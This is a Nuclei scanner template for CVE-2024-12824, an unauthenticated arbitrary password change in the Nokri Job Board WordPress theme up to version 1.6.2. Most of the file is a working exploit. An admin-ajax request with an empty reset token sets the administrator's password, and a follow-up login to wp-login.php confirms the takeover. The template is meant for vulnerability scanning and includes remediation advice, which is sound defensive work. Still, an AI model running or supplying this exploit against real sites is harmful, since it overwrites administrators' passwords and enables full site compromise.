id: CVE-2024-12824

info:
  name: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.
  impact: |
    Unauthenticated attackers can change arbitrary user passwords including administrators, enabling complete account takeover and site compromise.
  remediation: |
    Update Nokri theme to a version newer than 1.6.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/nokri-2/nokri-job-board-wordpress-theme-162-unauthenticated-arbitrary-password-change
    - https://themeforest.net/item/nokri-job-board-wordpress-theme/22677241
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/60a7cce0-637f-49bd-aa4a-fd7023d99a64?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12824
    cwe-id: CWE-620
    epss-score: 0.48295
    epss-percentile: 0.97787
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,intrusive,nokri,unauth,vuln

flow: http(1) && http(2)

variables:
  username: "admin"
  userid: 1
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=sb_reset_password&sb_data=token%3d-sb-uid-1%26sb_new_password={{password}}&

    matchers:
      - type: word
        part: body
        words:
          - 1|Password Changed successfully.
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{username}}&pwd={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a004730450220797d3ce19220ef64035cd7724d77dd62f6566a9c4b6686783869be1db7e7aaf1022100c3fb67b791046d4d1eb44c7fae25bb52966ec31e203554d0376a96a30eb4f474:922c64590222798bb761d5b6d8e72950